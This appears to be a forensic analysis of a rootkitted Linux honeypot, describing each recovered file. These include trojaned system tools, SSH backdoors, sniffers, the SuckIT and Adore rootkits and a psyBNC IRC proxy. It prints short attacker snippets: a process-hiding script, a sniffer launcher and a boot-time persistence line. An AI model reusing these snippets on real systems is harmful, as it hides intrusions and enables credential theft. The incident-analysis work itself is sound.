ELF executable, it is a exploit of the ptrace vulnerability, to increase system privileges to uid 0 (root).

d14dd73ee79bd009fc5473852ea55fac ---> 74 bytes <---

Contains the list of processes / strings to hide from the output of the trojaned 'ps' command. It contains:

psbnc

smbd

iceconf.h

icekey.h

icepid.h

uptime

startwu

r00t

Extracted from rk.tar.gz

9822e71858735f58e142293ad1695166 ---> 134 bytes <---

Contains the list of addresses to hide from trojaned 'netstat' command. Its contents:

1 213.233

1 24.104

1 217.10

1 216

1 193

1 209.118

3 10001

3 10002

3 13064 

3 19

3 69

3 6667

4 10001

4 6667 

4 10002

4 19

4 69

4 13064

The file was extracted from sk.tar.gz. In particular, the following connections were hidden: (found with trusted netstat command)

tcp  0 0 192.168.1.79:1149    64.62.96.42:6667       ESTABLISHED 15119/initd

tcp  0 0 192.168.1.79:1146    199.184.165.133:6667   ESTABLISHED 15119/initd

udp  0 0 192.168.1.79:1029    192.168.1.1:53         ESTABLISHED 15458/sendmail

initd is part of the psybnc package (see below).

95400773ef48d3898960c918553a74e4 ---> 59 bytes <---

Contains the list of strings to hide from trojaned 'ls' command. It contains:

psbnc

smbd

iceconf.h

icekey.h

icepid.h

uptime

startwu

r00t

Extracted from rk.tar.gz

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty file. In fact, it is (along with /dev/hdx2) a lock/semaphore file used by RST.b virus. This proves that several files, as 'sp0' or 'k' are contaminated with RST.b. The string 'GET /~telcom69/gov.php' inside these files confirms this.

RST.b is a virus that tries to read both on pp0 and eth0 in promiscuous mode.

See http://www.securityfocus.com/archive/100/247640 for details

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

See /dev/hdx1 description

3463b9f061397de435c3fa4f7201e9dc ---> 219308 bytes <---

slocate database file has been automatically rebuilt.

3ab2b49b2d1f188a6f898435d550f2a4 ---> 512 bytes <---

Random seed file for standard sshd server.

385d12f5f0295bc888e832fecf21f838 ---> 554 bytes <---

Standard logrotate default state file. Nothing interesting here.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty access log file.

9db9bac6f1a7083b89a49880138453da ---> 179 bytes <---

Log file that shows:

·  a telnet connection from 193.109.122.5, at Aug 10 16:04

·  a ssh connection from 202.85.165.46, at Aug 10 18:58.

c59428104fb9d66018093d4b91706fe5 ---> 16358 bytes <---

Log file that shows:

·  lots of error messages mailed to root.

·  a mail sent to jijeljijel@yahoo.com at Aug 10 14:14:01

·  a mail sent to newptraceuser@yahoo.com at Aug 10 15:37:40

·  a mail sent to newptraceuser@yahoo.com at Aug 10 15:42:31

·  a mail sent to skiZophrenia_siCk@yahoo.com at Aug 10 15:43:43

·  a mail sent to newptraceuser@yahoo.com at Aug 10 16:34:50 .

10ca2eef8abbc3b987773d0594f6cd18 ---> 3665 bytes <---

Shows that /usr/lib/sa/sa1 is executed every 10 minutes (but fails, see /var/spool/mail/root).

76eb13e6be26ca1e55c03c1aae2b7028 ---> 676 bytes <---

Log file. Some facts are showed there:

·  syslog startup & shutdown at Aug 10 13:33:57

·  sshd failed to start at Aug 10 14:13:47

·  httpd was restarted at Aug 10 15:52:10, and log file was previously deleted

71aa662387df40232004266b564e6eb4 ---> 80834 bytes <---

Whatis cache file was rebuilt.

0ffe5895797d438f4dcda5e8d61c53a4 ---> 20 bytes <---

Standard pid file for samba server daemon.

9359defefbf14f5abe7979302dcf3330 ---> 8192 bytes <---

Standard connections file for samba server daemon.

dd79b9b3fbd87b8cf5902769774dfd1e ---> 20 bytes <---

Standard pid file for netbios server daemon.

Unknown file.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Empty lock file. Shows that system was started at Aug 9 14:34. No interest here.

31aec4f90967e75fe302bc284dd2bcf2 ---> 4224 bytes <---

utmp run file. Shows system boot at Aug 9 14:34 & console root login one minute later. Nothing new.

4d637364dbabc3b52dcc9b62de6c743e ---> 11 bytes <---

Shows that we are in runlevel 3.

f3244ea97307a780a6ab2a4a7a09d1e7 ---> 5 bytes <---

Syslogd is PID 3247. Interesting point is that proves that syslog was restarted at Aug 10 13:33

3bf921f003734f68d89171a6b5fbd406 ---> 5 bytes <---

klogd is PID 3252. Again, the interesting point is that proves that log system was restarted at Aug 10 13:33

10acb03f24b5df50f22482fc620cc76c ---> 4 bytes <---

apmd is PID 657. It was started at system boot at Aug 9 14:34. No hacking info here

d0fe75fd3cb3d50a2a4744dbd3ed8c7d ---> 4 bytes <---

identd is PID 677. It was started at system boot at Aug 9 14:34. No hacking info here

aba3121d9a4398d318b708926dbf880d ---> 4 bytes <---

sshd is PID 699. It was started at system boot at Aug 9 14:34. But the file was accessed at Aug 10 14:13. Probably hacker or an automatic program checked for sshd pid.

a2ef60a97da72fbbcd66da60bc0faaf8 ---> 4 bytes <---

xinetd is PID 732. It was started at system boot at Aug 9 14:34. No hacking info here

d7dc9e01362a0627d64bd922455603ba ---> 32 bytes <---

sendmail is PID 759. It was started at system boot at Aug 9 14:34. No hacking info here

99f37a9889067f04d2d9fbc67ca448f0 ---> 4 bytes <---

gpm is PID 778. It was started at system boot at Aug 9 14:34. No hacking info here

95f378603a9d5b8c158a2e627ae09abd ---> 4 bytes <---

crond is PID 820. It was started at system boot at Aug 9 14:34. No hacking info here

8190fe72621c532e70e93e038ab717ca ---> 4 bytes <---

atd is PID 886. It was started at system boot at Aug 9 14:34. But process is no longer there.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Shows httpd was restarted at Aug 10 15:52, after executing /root/sslstop/sslport.

d41d8cd98f00b204e9800998ecf8427e ---> 0 bytes <---

Shows httpd was restarted at Aug 10 15:54.

a2cd5914ecbbec368df64bd0cba042ec ---> 15262 bytes <---

There are a lot of mails from cron deamon. Every ten minutes, it tries to run /usr/lib/sa/sa1, but fails, as /var/log/sa/sa10 cannot be opened.

bf129e89502a383fbc508d01c0ed7f73 ---> 9 bytes <---

Content shows 10 Aug 2003.

bf129e89502a383fbc508d01c0ed7f73 ---> 9 bytes <---

Content shows 10 Aug 2003.

74cc4500b7cf083a5cc7deb090d7eadf ---> 193 bytes <---

This file is modified by my initial 'mount /dev/cdrom /mnt/cdrom' command, needed to access trusted static binaries.

d583ed4e3a98f71ac5ae8b5e4caf3424 ---> 312188 bytes <---

This file contains the psyBNC 2.3.1 package. psyBNC is an IRC proxy that allows anonymization. psyBNC was downloaded & installed by our hacker at Aug 10 15:57. See http://www.netknowledgebase.com/tutorials/psybnc.html for details about psybnc

---> 4096 bytes <---

Extracted files from package above. The configuration file 'psybnc.conf' shows several entries, among them:

PSYBNC.SYSTEM.PORT1=65336

PSYBNC.SYSTEM.PORT2=-100

USER1.USER.LOGIN=sic

USER1.USER.NICK=[[[kgb]]]

USER1.SERVERS.SERVER1=mesa.az.us.undernet.org

USER1.SERVERS.PORT1=6667

USER1.CHANNELS.ENTRY1=#radioactiv

USER1.CHANNELS.ENTRY0=#RedCode

USER2.USER.LOGIN=redcode

USER2.USER.NICK=redcode

USER2.SERVERS.SERVER1=mesa.az.us.undernet.org

USER2.SERVERS.PORT1=6667

USER2.CHANNELS.ENTRY1=#AiaBuni

USER2.CHANNELS.ENTRY0=#RedCode

So, psyBNC was configured to talk to server mesa.az.us.undernet.org, with nick '[[[kgb]]]', and into channels #radioactiv & #RedCode, if using user 'sic'.

And with nick 'redcode', into channels #AiaBuni & #RedCode.

The system uses ports 65336 & 65436, apart from standard 6667 IRC port.

d19a34be51db694afbe844f01ff6f230 ---> 9315 bytes <---

It is the original functions file, but the following line was added at the end:

/usr/bin/crontabs -t1 -X53 -p

so it starts the trojaned 'crontabs' binary at system startup. It was modified by script 'install' inside rk.tar.gz

bde52d602f2a66a51a3d0fd958397640 ---> 20991 bytes <---

This system file has been modified to load kernel modules, regardless of configuration, and start kflushd. Doing a ‘diff’ command with a standard rc.sysinit for RedHat 7.2 gives:

56c56

< if grep -q /initrd /proc/mounts && ! grep -q /initrd/loopfs /proc/mounts ; then

---

> if grep -q /initrd /proc/mounts ; then

439c439

<       action $"Loading sound module ($alias): " modprobe sound

---

>       action $"Loading sound module ($alias): " modprobe $alias

444c444

<       action $"Loading sound module ($alias): " modprobe sound-slot-0

---

>       action $"Loading sound module ($alias): " modprobe $alias

744,745c735,736

<  [ -r /proc/modules ] && /bin/cat /proc/modules;

<  [ -r /proc/ksyms ] && /bin/cat /proc/ksyms) >/var/log/ksyms.0

---

>  /bin/cat /proc/modules;

>  /bin/cat /proc/ksyms) >/var/log/ksyms.0

754a746

> kflushd

ae6826b360dc7e169fb7409de4eca36e ---> 628 bytes <---

Standard mail statistics file.

597e7395603526c9cb37cdfdaaf8175f ---> 12288 bytes <---

Standard mail aliases file.

31089f51635afd4f8df196c729bdfb14 ---> 48 bytes <---

Standard adjtime file.

e3eccac859eb4441dce3a4b3640b5bb4 ---> 8192 bytes <---

Standard samba file.

abb3e3acb5459112415c7bee7a3bf4f4 ---> 50851 bytes <---

httpd configuration file. It has been modified by 'sslstop' & 'sslport' programs (see below), to close the standard SSL port 443 and use 114 instead, under the 'HAVE_SSS' tag instead of 'HAVE_SSL'.

That happened at Aug 10 15:52., and httpd was restarted.

928531d369ec509db354994d91a08c51 ---> 12288 bytes <---

This file is the configuration file used by the installed trojans 'top' and 'ps'. It is full of tty devices, so it probably lists the tty's to show info from.

58a7e5abe4b01923c619aca3431e13a8 ---> 48856 bytes <---

Trojan 'top' command. It uses /dev/psdevtab as configuration file.

Contained in rk.tar.gz, it was instaled at Aug 10 13:33.

The original top binary was moved to /usr/lib/libshift.

464dc23cac477c43418eb8d3ef087065 ---> 4060 bytes <---

perl script file. The file itself explains its purpose: Sorts the output from LinSniffer. It was installed at Aug 10 13:33.

Extracted from package rk.tar.gz

4cfae8c44a6d1ede669d41fc320c7325 ---> 8268 bytes <---

Contained in rk.tar.gz package.

ELF Executable. It seems to be a kind of SYN attack tool.

49d1b847a9639501a001036454118a59 ---> 98 bytes <---

Shell script file, it just have four -interesting- lines:

killall -9 /usr/bin/"(swapd)"

rm -rf /usr/bin/tcp.log

touch /usr/bin/tcp.log

"(swapd)" >tcp.log &

So, it starts the '(swapd)' sniffer (see below), logging its standard output to /usr/bin/tcp.log

f4198b40e62130ad6e173443037ded1b ---> 13707 bytes <---

Rootkit file, posing as a system file named 'crontabs'. Contained in rk.tar.gz, it just executes a 'system("smbd -D")', being 'smbd -D' a file name, not the standard smbd daemon with the -D option

It is started from /etc/rc.d/init.d/functions as 'crontabs -t1 -X53 -p' (see above). So it basically it is a method of starting the binary 'smbd -D' without being too noisy.

0c9fd2ff1740a4ae5b4a1a3a82846f44 ---> 672527 bytes <---

Another sshd file. It is currently running, as showed by ps & fuser commands.

It uses the configuration file /usr/include/iceconf.h.

Extracted from rk.tar.gz package, its original name was ava1

bc6d6b0ffb4e41e4753289fe28cf3521 ---> 18439 bytes <---

Contained in rk.tar.gz. It is an sniffer program, trying to log users & passwords. The source for this binary is in kde.c, inside rk.tar.gz.

It basically sniffs the network, and log users and passwords of standard services to file '/usr/lib/libice.log'.

Its PID is saved in file /usr/bin/x.pid

6ec8391d492a8b08387b885868124e07 ---> 5 bytes <---

It contains the PID of '(swapd)' sniffer. (see above)

0ea03807e53e90b147c4309573ebc76a ---> 83132 bytes <---

This is the original /bin/netstat file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

881c7af31f6f447e29820fb73dc1dd9a ---> 63180 bytes <---

This is the original /bin/ps file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

3e743c6bfa1e34f2f2164c6a1f1096d0 ---> 45948 bytes <---

This is the original /bin/ls file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

e984302652a0c59469a0d8826ae3cdeb ---> 51164 bytes <---

This is the original /sbin/ifconfig file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

6091c2a0a9231844d1ee9d43f29e6767 ---> 34924 bytes <---

This is the original /usr/bin/top file, moved here by the hacker. That happened at Aug 10 13:33, as reported by modification time.

The deleted & recovered installation script /tmp/sand/install was the author.

3af0bf9dc137cb0122f491a03578fa8d ---> 2 bytes <---

Unknown purpose. Contained in rk.tar.gz.

ca9b5865f9abf2681626b0425c602854 ---> 47 bytes <---

Log file for sniffer in process 3153 /usr/bin/(swapd) (see above).

It just contains an unfinished telnet connection to the honeypot:

proxyscan.undernet.org => 192.168.1.79 [23]

?k

That happened at Aug 10 16:04.

5ea1d457d6abac0badf6aad483eedec4 ---> 5636 bytes <---

Adore rootkit. See http://stealth.7350.org/rootkits/ for details

It was downloaded from http://izolam.net with wget and compiled, all through an automated script

f7396eecac23103623b75b47488133b2 ---> 1016 bytes <---

Part of the Adore rootkit (see above). Downloaded, compiled and installed with the same script.

18823bc17ecf747f5e7720bc206095e1 ---> 230163 bytes <---

It is sshd trojan binary, using configuration file /usr/lib/sp0_cfg.

7d35ce8c6f9a4a963499d2e69928d14e ---> 621 bytes <---

Configuration file for ssh server daemon in /usr/lib/sp0. It makes the daemon to listen in port 345, with Host Private key in /usr/lib/sp0_key, and random seed in /usr/lib/sp0_seed.

c64a48e10820d5de2c27f6ff1020d5f3 ---> 532 bytes <---

sshd host private key for /usr/lib/sp0. Interesting the string root@xxxbuck.com inside.

e8f34849cbf8c80edf835b6a5cdc3d35 ---> 513 bytes <---

sshd random seed file for sshd daemon /usr/lib/sp0.

5039776bb1a636b6a7ea2493d3a4d31c ---> 539 bytes <---

ssh private key. Interesting string inside: root@lessons.menchey.com.

Extracted from sk.tar.gz, its original name was 'h'

Used by "smbd -D" binary (see above).

18d0615f33203484ec58eaf88a022ca5 ---> 692 bytes <---

sshd configuration file. It configures a server running in port 2003, with host key in /usr/include/icekey.h.

Extracted from sk.tar.gz package, its original name was hh. It was installed by binary program ava1.

Used by "smbd -D" binary (see above).

4aac13dcc30140448f54eab730228c81 ---> 512 bytes <---

ssh random seed file.

Used by "smbd -D" binary (see above).

31bd68ac7cfb460e7f5e68a8eb1c184e ---> 5 bytes <---

Shows the PID of the sshd process with configuration files /usr/include/ice*. It turns out to be process 3137 "smbd -D".

c0e8b6ff00433730794eda274c56de3f ---> 30640 bytes <---

Trojaned netstat command. It uses the file /dev/ttyoa (see above) for configuration, hiding connections from certain addresses & ports.

Contained in rk.tar.gz package

a71c756f78583895afe7e03336686f8b ---> 32756 bytes <---

Trojaned 'ps' command. It uses the file /dev/ttyop as configuration file (process to hide from output).

Extracted from rk.tar.gz package.

9e7165f965254830d0525fda3168fd7d ---> 36692 bytes <---

Trojaned 'ls' command. It uses the file /dev/ttyof as configuration file (files to hide from output).

Extracted from rk.tar.gz package.

8b0afccbb9fec255fe38bdb6d0776ba7 ---> 165136 bytes <---

Extracted from rk.tar.gz package, seems to be a standard 'pico' editor. The hacker doesn't seem to like vim :-).

15502d3606c6597a9dfd93c5783cd0a0 ---> 303 bytes <---

Simple Shell script. It hides processes with 'lib/.x', 'xopen' or 'lsn' in its command name, using SuckIT rootkit.

Result is written in hide.log:

#!/bin/sh

for i in $(ps aux|grep "/lib/.x"|awk -F " " '{print $2}')

do

/lib/.x/sk i $i >>/lib/.x/hide.log

done

for z in $(ps aux|grep xopen|awk -F " " '{print $2}')

do

/lib/.x/sk i $z >>/lib/.x/hide.log

done

for x in $(ps aux|grep lsn|awk -F " " '{print $2}')

do

/lib/.x/sk i $z >>/lib/.x/hide.log

done

cf1d1e50ed26092f8e45f567a8c1d0b8 ---> 59137 bytes <---

Installation binary for SuckIT rootkit. It creates the 'rk' binary and moves standard /sbin/init to /sbin/init13996, putting 'rk' as the new /sbin/init.

But in the honeypot, these actions fail as /sbin/init has the inmutable bit set.

b25f11e3d1ef6174a70d64b9b9234871 ---> 25795 bytes <---

login executable from SuckIT rootkit.

3ae85818c23ade056241888a65dc2d20 ---> 17931 bytes <---

Log file cleaner from the same rootkit.

68b329da9893e34099c7d8ad5cb9c940 ---> 1 bytes <---

Unknown purpose file.

59abb063354d8a91ea81a8bc53a0e243 ---> 340 bytes <---

Unknown purpose file.

dd85d5ef3d7a2c75ce76cc8949aeebb5 ---> 669 bytes <---

Configuration file for trojan sshd server in /lib/.x/s/xopen.

fd444a070eaa57e06d6edb7a112f02cc ---> 217667 bytes <---

sshd troyan.

There are TWO instances running: processes 25239 & 25241

One of them is a trojaned ssh server, with a hacker’s password. The other is a tty sniffer, sending that information through UDP. But,as SucKIT installation didn’t work, the tty sniffing didn’t also.

95a2ef0596d7b9dbcf7f2105d9fd4986 ---> 536 bytes <---

ssh private key file for server in /lib/.x/s/xopen.

Interesting string inside: "root@fred.psiware.net"

a4073ec9e5602c8ff9fdcd9aee11b56d ---> 5192 bytes <---

Linux sniffer. Compressed with UPX (see http://upx.tsx.org).

Its output is send to /lib/.x/s/mfs

cbe94e12777a4890accf87b6ffcbfdfc ---> 5 bytes <---

Ascii file, contains 3128. It indicates the TCP port being used by /lib/.x/s/xopen for a ssh server.

4aaf69370305d47e01f74cf6cb74c237 ---> 1224 bytes <---

Log file of lsn binary (sniffer). It contains register of a few connections.. Several ftp outgoing connections and one incoming telnet:

============================================================

Time: Sun Aug 10 15:40:47     Size: 100

Path: 192.168.1.79 => 63.99.224.38 [21]

------------------------------------------------------------

============================================================

Time: Sun Aug 10 15:40:50     Size: 80

Path: 192.168.1.79 => 63.99.224.38 [21]

------------------------------------------------------------

============================================================

Time: Sun Aug 10 15:40:56     Size: 60

Path: 192.168.1.79 => 63.99.224.38 [21]

------------------------------------------------------------

============================================================

Time: Sun Aug 10 15:41:08     Size: 40

Path: 192.168.1.79 => 63.99.224.38 [21]

------------------------------------------------------------

============================================================

Time: Sun Aug 10 15:41:32     Size: 20

Path: 192.168.1.79 => 63.99.224.38 [21]

------------------------------------------------------------

============================================================

Time: Sun Aug 10 16:04:13     Size: 44

Path: proxyscan.undernet.org => 192.168.1.79 [23]

------------------------------------------------------------

f87c74d6bc8c09a6f9bd4f005f314f43 ---> 512 bytes <---

Random Seed file for ssh server in /lib/.x/s/xopen.

cf20da4e54f0b6a827d4a2fdab680528 ---> 6 bytes <---

PID file for ssh server in /lib/.x/s/xopen. Shows the PID 25241, latest running xopen process

4cff27a31b0ba259e1b23ce53fe2ebfc ---> 2442 bytes <---

log file from /lib/.x/s/xopen (process 25239). It is full of entries like:

#####################################################

# SucKIT version 1.3b by Unseen  #

#####################################################

RK_Init: idt=0xffc17800, FUCK: Can't find sys_call_table[]

Indicating that connection to SucKIT rootkit kernel modules failed.

64998f31cbc2a3c1bc4fbbf28a0382d7 ---> 222 bytes <---

Log file for 'hide' script (see above). SucKIT rootkit installation didn't work, as the file tell us:

#####################################################

# SucKIT version 1.3b by Unseen  #

#####################################################

RK_Init: idt=0xffc17800, FUCK: Can't find sys_call_table[]

4a2ba3c11bc601716a0af3d0dcd0b158 ---> 28632 bytes <---

SuckIT rootkit, version 1.3b., see http://sd.g-art.nl/sk

From its README file:

  The SucKIT is easy-to-use, Linux-i386 kernel-based rootkit. The code

  stays in memory through /dev/kmem trick, without help of LKM support

  nor System.map or such things. Everything is done on the fly. It can

  hide PIDs, files, tcp/udp/raw sockets, sniff TTYs. Next, it have

  integrated TTY shell access (xor+sha1) which can be invoked through

  any running service on a server. No compiling on target box needed,

  one binary can work on any of 2.2.x & 2.4.x kernels precompiled (libc-free)

This binary was created by script 'inst'

b3b377e87fecd930a4a6fbf13aac054f ---> 1223 bytes <---

Installation script for sucKIT & friends.

In particular, it tries to start the ssh server, the network sniffer and the tty sniffer, hiding its associated processes. It then mails this information to skiZophrenia_sick@yahoo.com.

(Un)fortunately it didn't work

b8fdf7e848fde9e659ac6bc2c22fc871 ---> 1627 bytes <---

sslstop package. It contains the sources for two programs: sslstop & sslport, that change the httpd configuration, so that http does no longer use standard ssl port 443, and changes the entry HAVE_SSL with HAVE_SSS.

67c55b1cd1c1e0fb259fa0944cdba875 ---> 87 bytes <---

Makefile for the sslstop package. (see above)

2716b9205cafdd8026521884aa64238c ---> 2794 bytes <---

Source file for the sslport binary.

1288b008faeb780f22aae86fe9397d6a ---> 1809 bytes <---

Source file for the sslstop binary.

5bcd845b4f43b24c1c584b7b495f502e ---> 16452 bytes <---

sslstop binary, from the package above.

ee39910251ea42f812334865dfb84613 ---> 17351 bytes <---

sslport binary, from the package above.